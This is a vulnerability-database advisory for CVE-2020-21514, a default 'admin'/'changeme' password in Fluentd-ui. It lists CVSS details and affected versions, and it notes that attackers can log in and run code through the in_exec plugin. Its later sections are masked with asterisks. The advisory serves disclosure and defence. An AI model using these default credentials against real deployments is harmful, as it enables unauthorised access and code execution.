Miggo Logo
Miggo Vulnerability Database
CVE-2020-21514

CVE-2020-21514: Fluent Fluentd and Fluent-ui use default password

8.8

CVSS Score
3.1

Basic Information

CVE ID
CVE-2020-21514
GHSA ID
GHSA-wrxf-x8rm-6ggg
EPSS Score
0.26215%
CWE
CWE-276
Published
4/4/2023
Updated
2/13/2025
KEV Status
No
Technology
TechnologyRuby

Technical Details

CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
Package NameEcosystemVulnerable VersionsFirst Patched Version
fluentdrubygems<= 1.8.0
fluentd-uirubygems<= 1.2.2

Vulnerability Intelligence
Miggo AIMiggo AI

Miggo AIRoot Cause Analysis

The vulnerability stems from the use of a default password ('admin'/'changeme') in Fluentd-ui, which is not enforced to be changed post-deployment. While the advisory doesn't explicitly name specific functions, the presence of this flaw implies that the user initialization or authentication setup code in Fluentd-ui is responsible for creating/administering the default credentials. Attackers leverage this to gain access and exploit functionalities like the in_exec plugin (enabled by default in Fluentd) for code execution. The CWE-276 (Incorrect Default Permissions) further supports this analysis, as the system ships with insecure default authentication settings.

Vulnerable functions

Only Mi**o us*rs **n s** t*is s**tion

WAF Protection Rules

WAF Rule

*n issu* w*s *is*ov*r** in *lu*nt *lu*nt* v.*.*.* *n* *lu*nt-ui v.*.*.* t**t *llows *tt**k*rs to **in *s*il*t** privil***s *n* *x**ut* *r*itr*ry *o** *u* to us* o* * ****ult p*sswor*.

Reasoning

T** vuln*r**ility st*ms *rom t** us* o* * ****ult p*sswor* ('**min'/'***n**m*') in `*lu*nt*-ui`, w*i** is not *n*or*** to ** ***n*** post-**ploym*nt. W*il* t** **visory *o*sn't *xpli*itly n*m* sp**i*i* *un*tions, t** pr*s*n** o* t*is *l*w impli*s t**